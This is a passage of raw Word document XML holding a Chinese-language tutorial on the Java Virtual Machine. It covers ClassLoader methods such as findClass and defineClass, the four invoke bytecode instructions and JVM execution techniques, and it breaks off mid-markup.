    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>findClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>此方法直接抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassNotFoundException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，因此需要通过覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>loadClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或此方法来以自定义的方式加载相应的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（4）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>findSystemClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>此方法负责从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中寻找类，如未找到，则继续从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bootstrap ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中寻找，如仍然为找到，则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（5）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>defineClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>此方法负责将二进制的字节码转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（6）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>resolveClass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>此方法负责完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象的链接，如已链接过，则会直接返回。</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>四、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>执行引擎</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在执行方法时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>提供了四种指令来执行：</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>invokestatic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：调用类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>方法</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>invokevirtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：调用对象实例的方法</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>invokeinterface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：将属性定义为接口来进行调用</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>invokespecial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对于初始化对象（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>构造器的方法为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;init&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）以及调用对象实例中的私有方法时。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>主要的执行技术有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>解释，即时编译，自适应优化、芯片级直接执行</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）解释属于第一代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）即时编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
